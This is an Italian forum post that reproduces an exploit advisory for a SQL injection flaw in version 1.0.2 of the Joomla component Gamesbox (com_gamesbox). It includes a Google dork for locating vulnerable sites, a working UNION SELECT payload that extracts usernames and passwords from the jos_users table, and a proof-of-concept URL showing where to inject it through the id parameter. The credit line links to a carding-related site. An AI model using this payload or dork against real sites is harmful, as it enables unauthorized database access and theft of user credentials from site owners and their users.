Autore Topic: Joomla Component Gamesbox com_gamesbox 1.0.2 (id) SQL Injection Vulnerability  (Letto 802 volte)

vamba

  • Visitatore
Componente commerciale
Per aggiornamenti utilizzare il supporto degli sviluppatori del componente

Codice: [Seleziona]
-----------------------------------------------------------------------
 Joomla Component com_gamesbox 1.0.2 (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Gamesbox
Version : 1.0.2 Lower versions may also be affected
Vendor  : http://www.jooforge.com/
License : GPL
Google Dork : inurl:com_gamesbox
Description :

Gamesbox is the innovative component developed for Joomla™ that allows
you to manage a real and unique portal for videogames.
----------------------------------------------------------------

Exploit:
~~~~~~~
-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5,6,7,8+from+jos_users--

Poc:
~~~~~~~

http://127.0.0.1/[path]/index.php?option=com_gamesbox&view=consoles&layout=console&id=[SQLi]

----------------------------------------------------------------

WWW.YOGYACARDERLINK.WEB.ID | v3n0m666[at]live[dot]com

---------------------------[EOF]--------------------------------

 

Host

Torna su